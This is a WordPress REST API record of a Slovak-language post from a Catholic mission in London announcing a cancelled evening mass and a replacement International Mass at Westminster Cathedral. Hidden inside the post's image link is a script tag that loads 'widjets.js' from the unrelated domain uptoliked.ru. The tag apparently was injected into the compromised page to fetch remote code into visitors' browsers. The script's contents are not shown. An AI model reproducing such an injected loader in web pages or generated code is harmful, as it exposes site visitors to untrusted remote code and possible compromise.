{"id":20509,"date":"2015-09-07T12:16:16","date_gmt":"2015-09-07T11:16:16","guid":{"rendered":"http:\/\/www.scmlondon.org\/?p=20509"},"modified":"2015-09-20T12:24:21","modified_gmt":"2015-09-20T11:24:21","slug":"upozornenie-5","status":"publish","type":"post","link":"https:\/\/www.scmlondon.org\/?p=20509","title":{"rendered":"UPOZORNENIE"},"content":{"rendered":"<h2 style=\"text-align: justify;\"><span style=\"color: #ff0000;\"><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2015\/09\/Our-Lady-of-La-Salette-and-St.-Joseph.jpg\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-thumbnail wp-image-20511\" alt=\"Our Lady of La Salette and St. Joseph\" src=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2015\/09\/Our-Lady-of-La-Salette-and-St.-Joseph-150x150.jpg\" width=\"150\" height=\"150\" srcset=\"https:\/\/www.scmlondon.org\/wp-content\/uploads\/2015\/09\/Our-Lady-of-La-Salette-and-St.-Joseph-150x150.jpg 150w, https:\/\/www.scmlondon.org\/wp-content\/uploads\/2015\/09\/Our-Lady-of-La-Salette-and-St.-Joseph-144x144.jpg 144w\" sizes=\"auto, (max-width: 150px) 100vw, 150px\" \/><script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/a>Slovensk\u00e1 katol\u00edcka misia v Lond\u00fdne oznamuje, \u017ee nede\u013en\u00e1 ve\u010dern\u00e1 sv\u00e4t\u00e1 om\u0161a o 19.30 hod. d\u0148a 27. septembra 2015 sa v kostole SCM nekon\u00e1 !!!<br \/>\n<\/span><\/h2>\n<h2 style=\"text-align: justify;\"><span style=\"color: #ff0000;\">Nahr\u00e1dza ju spolo\u010dn\u00e9 stretnutie vo westminsterskej katedr\u00e1le o 17.30 hod., kde sa kon\u00e1 International Mass. Sv\u00e4t\u00fa om\u0161u bude celebrova\u0165 kardin\u00e1l Vincent Nichols, westminstersk\u00fd arcibiskup. <\/span><\/h2>\n<h2 style=\"text-align: justify;\"><span style=\"color: #ff0000;\">V\u0161etci ste pozvan\u00ed na t\u00fato udalos\u0165 zahrani\u010dn\u00fdch komun\u00edt s najvy\u0161\u0161\u00edm pastierom na\u0161ej diec\u00e9zy, pod ktor\u00fa patr\u00ed SCM.\u00a0<\/span><\/h2>\n","protected":false},"excerpt":{"rendered":"<p>Slovensk\u00e1 katol\u00edcka misia v Lond\u00fdne oznamuje, \u017ee nede\u013en\u00e1 ve\u010dern\u00e1 sv\u00e4t\u00e1 om\u0161a o 19.30 hod. d\u0148a 27. septembra 2015 sa v kostole SCM nekon\u00e1 !!! Nahr\u00e1dza ju spolo\u010dn\u00e9 stretnutie vo westminsterskej&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?p=20509\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":417,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-20509","post","type-post","status-publish","format-standard","hentry","category-28"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/20509","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20509"}],"version-history":[{"count":3,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/20509\/revisions"}],"predecessor-version":[{"id":20513,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/20509\/revisions\/20513"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20509"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20509"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20509"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}